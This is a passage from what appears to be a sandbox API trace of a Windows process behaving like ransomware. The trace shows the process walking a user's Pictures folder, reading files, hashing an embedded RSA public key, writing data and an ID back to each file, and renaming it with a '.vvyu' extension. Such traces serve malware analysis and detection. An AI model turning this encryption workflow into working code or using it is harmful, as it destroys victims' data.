hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af36a8 | out: hHeap=0x2c0000) returned 1 [0191.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.132] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x151de, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x151de, lpOverlapped=0x0) returned 1 [0191.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.134] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x151e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.134] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.135] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.135] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.135] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.135] CloseHandle (hObject=0x584) returned 1 [0191.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.138] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\oQ7roSq7BYOcKq_wI3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\oq7rosq7byockq_wi3.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\oQ7roSq7BYOcKq_wI3.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\oq7rosq7byockq_wi3.gif.vvyu")) returned 1 [0191.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.139] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.142] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ce64d70, ftCreationTime.dwHighDateTime=0x1d8a277, ftLastAccessTime.dwLowDateTime=0xed638760, ftLastAccessTime.dwHighDateTime=0x1d8a3e9, ftLastWriteTime.dwLowDateTime=0xed638760, ftLastWriteTime.dwHighDateTime=0x1d8a3e9, nFileSizeHigh=0x0, nFileSizeLow=0x9165, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QG2UxZ3cw8a4fuoL_L.gif", cAlternateFileName="QG2UXZ~1.GIF")) returned 1 [0191.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36a8 [0191.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af36a8 | out: hHeap=0x2c0000) returned 1 [0191.143] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\QG2UxZ3cw8a4fuoL_L.gif") returned=".gif" [0191.143] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\QG2UxZ3cw8a4fuoL_L.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\qg2uxz3cw8a4fuol_l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.144] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=37221) returned 1 [0191.144] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.148] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x913f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.148] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.150] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.150] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9165, lpOverlapped=0x0) returned 1 [0191.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.152] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.153] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.153] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.153] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.153] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.153] GetLastError () returned 0x0 [0191.153] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.153] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.154] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.154] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.154] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9170) returned 0x2af5168 [0191.154] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36a8 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36f0 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.155] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0191.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0191.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5fd8 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.158] GetCurrentThreadId () returned 0x5d8 [0191.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5808 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.159] GetCurrentThreadId () returned 0x5d8 [0191.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0191.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.164] HeapFree (in: hHeap=0x2c0000, 